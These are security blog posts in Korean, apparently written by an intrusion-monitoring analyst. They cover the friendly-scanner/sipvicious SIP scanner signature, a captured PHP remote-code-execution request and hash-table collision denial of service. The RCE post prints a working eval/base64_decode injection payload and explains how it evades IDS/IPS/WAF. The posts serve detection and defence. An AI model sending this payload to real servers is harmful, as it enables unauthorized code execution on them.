User-Agent: friendly-scanner
friendly-scanner는 SIP/VoIP 포트 스캐너로, 포트를 발견하면 추가적으로 무차별 인증시도를 한다.
RAWDATA
OPTIONS ~~~~
D_port:5060(VoIP)
From: "sipvicious"', User-Agent: friendly-scanner
참고
https://www.youtube.com/watch?v=Zp_gzjV8l4c
| PHP Remote Code Execution and Sending E-mail (0) | 2015.12.01 |
|---|---|
| robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가 (0) | 2015.11.26 |
| base64 encode PHP Execute (0) | 2015.11.25 |
| Hash Table DOS (0) | 2015.11.24 |
| HTTP CONNECT Proxy Request (0) | 2015.11.24 |
base64 encode PHP Execute
RAWDATA
POST/index.php?s=/abc/abc/abc/${@print(eval($_POST[c]))}
c=@eval(base64_decode($_POST[x0]));
x0=ZWNobyAiLT58MTIzfDwtIjs=
s=/abc/abc/abc/${@print(eval($_POST[c]))}
공격자는 HTTP Requset에 따른 Response를 바로 확인하기 위해 print 함수를 사용하고, 이를 통해 취약한 서버임을 확인 할 수 있다.
c=@eval(base64_decode($_POST[x0]));
위는 x 0 파라미터를 base64로 디코딩한 결과 값이다. IDS/IPS/WAF 등 보안 장비를 우회하기 위한 방법이다.
만약 공격이 성공했다면 ->|123|<-를 출력한다.
| PHP Remote Code Execution and Sending E-mail (0) | 2015.12.01 |
|---|---|
| robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가 (0) | 2015.11.26 |
| User-Agent: friendly-scanner (0) | 2015.11.25 |
| Hash Table DOS (0) | 2015.11.24 |
| HTTP CONNECT Proxy Request (0) | 2015.11.24 |
Hash Table DOS
GET, POST 메소드로 전송되는 파라미터 값을 접근하기 쉽고 빠르게 하기 위해 Hash Table 구조로 관리
많은 파라미터 요청 시 Hash Table 충돌발생 → CPU 부하 → 서비스 지연 or 서비스 불가
*회원가입 페이지 또는 게시글 업로드 페이지를 작성 후에 POST 메소드로 전송되는 Content-Disposition의 수가 많을 경우, 일부 오탐 가능성이 있을 수 있으므로 적절한 임계치 설정이 필요함
| PHP Remote Code Execution and Sending E-mail (0) | 2015.12.01 |
|---|---|
| robots.txt 파일에 접근하는 클라이언트를 차단 하는것이 적절한가 (0) | 2015.11.26 |
| User-Agent: friendly-scanner (0) | 2015.11.25 |
| base64 encode PHP Execute (0) | 2015.11.25 |
| HTTP CONNECT Proxy Request (0) | 2015.11.24 |